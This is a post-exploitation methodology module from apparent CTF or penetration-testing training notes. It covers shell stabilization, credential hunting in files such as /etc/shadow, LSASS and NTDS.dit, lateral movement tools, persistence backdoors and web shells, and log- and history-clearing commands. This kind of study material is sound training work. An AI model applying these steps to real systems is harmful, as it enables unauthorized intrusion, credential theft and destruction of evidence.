Back to All Modules

07 - Post-Exploitation Methodology

#Overview

Post-exploitation is the phase after gaining initial access to a target system. The goal is to stabilize access, gather situational awareness, hunt for credentials, and pivot deeper into the network. A structured methodology prevents missed opportunities and minimizes detection risk.

#Priority Order

PriorityActionGoal
1Stabilize ShellUpgrade to fully interactive TTY or persistent agent
2Situational AwarenessUnderstand the system, network, and domain context
3Credential HuntingRecover passwords, hashes, tokens, and keys
4Local Privilege EscalationElevate from low-privilege user to root/SYSTEM
5Lateral MovementMove to adjacent systems using harvested credentials
6PersistenceEnsure future access survives reboots
7PivotingTunnel through compromised hosts to reach segmented networks
8Exfiltration / ObjectiveRetrieve flags, data, or achieve the engagement goal

#Phase 1: Shell Stabilization

Immediately after catching a reverse shell, upgrade it. Non-interactive shells lack tab completion, arrow keys, and will die on Ctrl-C. Techniques vary by platform:

  • Linux: Python TTY spawn, stty raw -echo, socat, rlwrap
  • Windows: PowerShell reverse shells, Nishang, meterpreter stagers
  • See shell-upgrade-and-stabilization.md for full details

#Phase 2: Situational Awareness

Do not immediately run whoami. Start with the least noisy enumeration and escalate:

  1. Basic identity: whoami, id, whoami /all
  2. Network posture: interfaces, routes, listening ports, firewall rules
  3. OS and patches: uname -a, /etc/os-release, systeminfo, wmic qfe
  4. Users and groups: who, w, net user, net localgroup, domain group membership
  5. Running processes: ps aux, Get-Process, check for AV/EDR
  6. Domain context: set l, echo %logonserver%, nltest /dclist

See situational-awareness.md for exhaustive enumeration commands.

#Phase 3: Credential Hunting

Credentials are the currency of lateral movement. Systematic searching pays dividends:

  1. Configuration files: wp-config.php, .env, web.config, connectionStrings
  2. History files: .bash_history, PSReadline consolehost_history.txt
  3. SSH keys: ~/.ssh/id_rsa, authorized_keys
  4. OS credential stores: /etc/shadow, SAM/SYSTEM, LSASS, DPAPI
  5. Version control: git log -p, git show, .git-credentials
  6. Browser stores: Chrome, Firefox, Edge saved passwords
  7. Automation tools: Ansible vault, unattend.xml, sysprep.xml
  8. Domain databases: NTDS.dit, LAPS, GMSA

See credential-hunting.md for full methodology.

#Phase 4: Local Privilege Escalation

Elevation paths differ by platform. Prioritize enumeration over blind exploit attempts:

  • Linux: SUID/SGID binaries, sudo -l, capabilities, cron jobs, writable services, kernel exploits
  • Windows: Service misconfigurations, token privileges, UAC bypass, scheduled tasks, DLL hijacking

Always run automated enumeration tools first (linpeas.sh, WinPEAS, PowerUp.ps1), then pivot to manual checks.

#Phase 5: Lateral Movement

With credentials and situational awareness, move to adjacent systems:

  1. Pass-the-Hash (PtH): crackmapexec, Impacket psexec, wmiexec
  2. Pass-the-Ticket (PtT): Kerberos ticket reuse, Rubeus
  3. WinRM: evil-winrm with harvested credentials
  4. SSH: SSH keys, password reuse across systems
  5. RDP: xfreerdp with credentials
  6. SMB: Impacket smbexec, atexec, dcomexec

See pivoting-and-tunneling.md for moving through segmented networks.

#Phase 6: Persistence

Establish redundant access paths in case the primary shell dies:

  • SSH authorized_keys backdoor
  • Scheduled tasks / cron jobs
  • WMI event subscriptions
  • Service binary replacement
  • Web shells in writable directories

#Phase 7: Pivoting and Tunneling

When the target has internal network access, use it as a jump host:

  • SSH dynamic forwarding (-D for SOCKS proxy)
  • Chisel (lightweight TCP tunnel over HTTP)
  • Ligolo-ng (modern tunneling with TUN interface)
  • Metasploit autoroute + socks_proxy
  • Netsh portproxy (Windows native forwarding)

#Phase 8: Covering Tracks

  • Clear shell history: export HISTFILE=/dev/null, Remove-Item (Get-PSReadlineOption).HistorySavePath
  • Delete uploaded tools from writable temp directories
  • Remove added SSH keys and user accounts
  • Clear event logs: wevtutil cl

#Cross-References

#Source Machines

  • Escape (Medium, Windows) - MSSQL coerced auth, ESC1 ADCS attack
  • StreamIO (Medium, Windows) - MSSQL enumeration, BloodHound, LAPS
  • Support (Easy, Windows) - LDAP enumeration, RBCD attack
  • Cereal (Hard, Windows) - SeImpersonatePrivilege, SSRF, SweetPotato
  • Cerberus (Hard, Linux) - Firejail breakout, Kerberos cache, pivoting
  • Help (Easy, Linux) - Kernel exploit, GraphQL enumeration